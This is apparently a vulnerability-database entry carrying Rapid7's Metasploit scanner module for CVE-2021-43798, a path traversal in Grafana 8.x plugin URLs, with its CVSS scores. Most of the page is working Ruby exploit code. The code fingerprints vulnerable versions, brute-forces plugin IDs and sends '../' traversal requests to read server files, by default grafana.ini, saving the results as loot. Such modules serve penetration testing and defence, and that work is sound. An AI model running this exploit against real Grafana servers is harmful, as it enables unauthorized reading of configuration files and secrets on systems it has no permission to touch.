Grafana Plugin Path Traversal

2021-12-1310:27:29

h00die, jordyv

www.rapid7.com

183

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.8 High

AI Score

Confidence

High

0.975 High

EPSS

Percentile

100.0%

JSON

Grafana versions 8.0.0-beta1 through 8.3.0 prior to 8.0.7, 8.1.8, 8.2.7, or 8.3.1 are vulnerable to directory traversal through the plugin URL. A valid plugin ID is required, but many are installed by default.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Grafana Plugin Path Traversal',
        'Description' => %q{
          Grafana versions 8.0.0-beta1 through 8.3.0 prior to 8.0.7, 8.1.8, 8.2.7, or 8.3.1 are vulnerable to directory traversal
          through the plugin URL.  A valid plugin ID is required, but many are installed by default.
        },
        'Author' => [
          'h00die', # msf module
          'jordyv' # discovery
        ],
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS]
        },
        'DisclosureDate' => '2021-12-02',
        'References' => [
          ['CVE', '2021-43798'],
          ['URL', 'https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p'],
          ['URL', 'https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/'],
          ['EDB', '50581'],
          ['URL', 'https://github.com/jas502n/Grafana-CVE-2021-43798'],
          ['URL', 'https://github.com/grafana/grafana/commit/c798c0e958d15d9cc7f27c72113d572fa58545ce'],
          ['URL', 'https://labs.detectify.com/security-guidance/how-i-found-the-grafana-zero-day-path-traversal-exploit-that-gave-me-access-to-your-logs/']
        ]
      )
    )
    register_options(
      [
        Opt::RPORT(3000),
        OptString.new('TARGETURI', [ true, 'Path to Grafana instance', '/']),
        OptString.new('FILEPATH', [true, 'The name of the file to download', '/etc/grafana/grafana.ini']),
        OptInt.new('DEPTH', [true, 'Traversal depth', 13]),
        OptPath.new('PLUGINS_FILE', [
          true, 'File containing plugins to enumerate',
          File.join(Msf::Config.data_directory, 'wordlists', 'grafana_plugins.txt')
        ]),
      ]
    )
  end

  def print_progress(host, current, total)
    print_status("#{host} - Progress #{current.to_s.rjust(Math.log10(total).ceil + 1)}/#{total} (#{((current.to_f / total) * 100).truncate(2)}%)")
  end

  def check
    res = send_request_cgi!({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    })
    return Exploit::CheckCode::Unknown unless res && res.code == 200

    # We need to take into account beta versions, which end with -beta<digit>. See: https://grafana.com/docs/grafana/latest/release-notes/
    # Also take into account preview versions, which end with -preview. See https://grafana.com/grafana/download/10.0.0-preview?edition=oss for more info.
    /"subTitle":"Grafana v(?<full_version>\d{1,2}\.\d{1,2}\.\d{1,2}(?:(?:-beta\d)?|(?:-preview)?)) \([0-9a-f]{10}\)",/ =~ res.body
    return Exploit::CheckCode::Safe unless full_version

    # However, since 8.3.1 does not have a beta, we can safely ignore the -beta suffix when comparing versions
    # In fact, this is necessary because Rex::Version doesn't correctly handle versions ending with -beta when comparing
    if /-beta\d$/ =~ full_version
      version = Rex::Version.new(full_version[0..-7])
    elsif /-preview$/ =~ full_version
      version = Rex::Version.new(full_version[0..-9])
    else
      version = Rex::Version.new(full_version)
    end

    if version.between?(Rex::Version.new('8.0.0-beta1'), Rex::Version.new('8.0.7')) ||
       version.between?(Rex::Version.new('8.1.0'), Rex::Version.new('8.1.8')) ||
       version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.7')) ||
       version.between?(Rex::Version.new('8.3.0'), Rex::Version.new('8.3.1'))
      print_good("Detected vulnerable Grafana: #{full_version}")
      return Exploit::CheckCode::Appears
    end
    print_bad("Detected non-vulnerable Grafana: #{full_version}")
    return Exploit::CheckCode::Safe
  end

  def run_host(ip)
    check_code = check
    return unless check_code == Exploit::CheckCode::Appears

    f = File.open(datastore['PLUGINS_FILE'], 'rb')
    total = f.readlines.count
    f.rewind
    f = f.readlines
    f.each_with_index do |plugin, i|
      plugin = plugin.strip
      print_progress(target_host, i, total)
      vprint_status("Attempting plugin: #{plugin}")
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'public', 'plugins', plugin, '../' * datastore['DEPTH'], datastore['FILEPATH'])
      })
      next unless res && res.code == 200

      print_good("#{plugin} was found and exploited successfully")
      vprint_good(res.body)
      path = store_loot(
        'grafana.loot',
        'application/octet-stream',
        ip,
        res.body,
        File.basename(datastore['FILEPATH'])
      )
      print_good("#{rhost}:#{rport} - File saved in: #{path}")
      break
    end
  end

end